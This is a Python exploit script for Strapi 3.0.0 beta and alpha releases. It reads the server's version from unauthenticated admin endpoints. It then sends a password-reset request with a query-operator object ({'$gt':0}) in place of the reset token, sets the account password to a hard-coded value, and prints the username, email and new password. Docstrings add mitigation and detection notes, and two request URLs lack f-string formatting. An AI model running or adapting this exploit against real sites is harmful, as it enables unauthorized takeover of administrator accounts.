#Author Kynda
#01/01/2020
import requests, sys, json
# Replacement password the script submits; hard-coded and printed on success.
NEW_PASS = "Shadawks123*"

# Exactly two positional arguments are required: the base URL and an email.
if len(sys.argv[1:]) != 2:
    sys.exit("[ ! ] Usage: python3 exploit.py <url> <email>")
def isVuln(version):
    """Return True when *version* names a 3.0.0 beta or alpha release.

    This is a plain prefix match on the version string. It does not tell
    individual beta/alpha builds apart, so a True result means "check this
    instance against the vendor advisory", not "confirmed affected".
    """
    affected_prefixes = ('3.0.0-beta', '3.0.0-alpha')
    # str.startswith accepts a tuple and returns a bool directly.
    return version.startswith(affected_prefixes)
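def get_version(url):
    """Read the Strapi version the server advertises and print a verdict.

    Two unauthenticated endpoints are tried in order: ``/admin/init``
    (version under ``data.strapiVersion``) and ``/admin/strapiVersion``
    (version under ``strapiVersion``). The first one that yields a string
    is passed to ``isVuln``.

    Args:
        url: Base URL of the instance, without a trailing slash.

    Returns:
        None. The outcome is reported on stdout only.

    The verdict comes from a version-string prefix match, so it is an
    indicator rather than proof. For operators: both endpoints disclose the
    exact version without authentication, which makes the instance easy to
    fingerprint.
    """
    print("[ + ] Checking Strapi Version")
    # (endpoint path, key path inside the JSON body), tried in this order.
    lookups = (
        ("/admin/init", ("data", "strapiVersion")),
        ("/admin/strapiVersion", ("strapiVersion",)),
    )
    version = None
    for path, keys in lookups:
        try:
            # A timeout keeps an unresponsive host from hanging the check.
            node = requests.get(f"{url}{path}", timeout=10).json()
            for key in keys:
                node = node[key]
        except (KeyError, TypeError, ValueError, requests.RequestException):
            # Missing key, unexpected JSON shape, non-JSON body (JSON decode
            # errors are ValueError subclasses) or a transport failure:
            # fall through to the next endpoint instead of crashing.
            continue
        if isinstance(node, str):
            version = node
            break
    if version is None:
        print("[ - ] Can't find Strapi Version.")
    elif isVuln(version):
        print("[ + ] Target version is vulnerable.")
    else:
        print("[ - ] Target version is not vulnerable.")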
def pass_reset(url, email):
    """Send two POST requests and report whether a password reset went through.

    Args:
        url: Base URL of the Strapi instance, without a trailing slash.
        email: Address placed in the "email" field of the first request.

    Exits through sys.exit() when the second response is not JSON or has no
    "jwt" key; otherwise prints the username and email taken from the
    response together with NEW_PASS.

    Defender notes: the second request puts an object ({"$gt": 0}) in the
    "code" field instead of a token string. This looks like query-operator
    injection against the reset-token lookup (presumably the field reaches
    the database query unvalidated; confirm against the server code).
    Mitigation is to reject any "code" that is not a string before it is
    used in a query, and to run a patched release. For detection, a JSON
    object or a "$"-prefixed key in "code" on a reset-password route is a
    strong signal, as is a reset that succeeds without a mailed token.
    """
    # Body of the reset request: operator object in "code", plus the new
    # password and its confirmation.
    params = {
    "code": {"$gt":0},
    "password": NEW_PASS,
    "passwordConfirmation": NEW_PASS
    }
    # Body of the first request; its response is not inspected.
    payload = {"email": email, "url":"{url}/admin/plugins/users-permissions/auth/reset-password"}
    requests.post("{url}/", json=payload)
    try:
        r = requests.post(f"{url}/admin/auth/reset-password", json=params).json()
        # A "jwt" in the response means the server accepted the reset and
        # issued a session token for the account.
        if "jwt" not in r:
            sys.exit("[ - ] Website is not vulnerable.")
        # Note: this writes the account name, email and new password to stdout.
        print(f"[ + ] Password reset successfull.\nUsername: {r['user']['username']}\nEmail: {r['user']['email']}\nPassword: {NEW_PASS}")
    except json.decoder.JSONDecodeError:
        # A non-JSON reply is treated the same as a rejected reset.
        sys.exit("[ - ] Website is not vulnerable.")
# Drop one trailing slash from the base URL so path joins do not double it.
url = sys.argv[1]
if url.endswith('/'):
    url = url[:-1]
email = sys.argv[2]

# Version check first, then the reset attempt.
get_version(url)
pass_reset(url, email)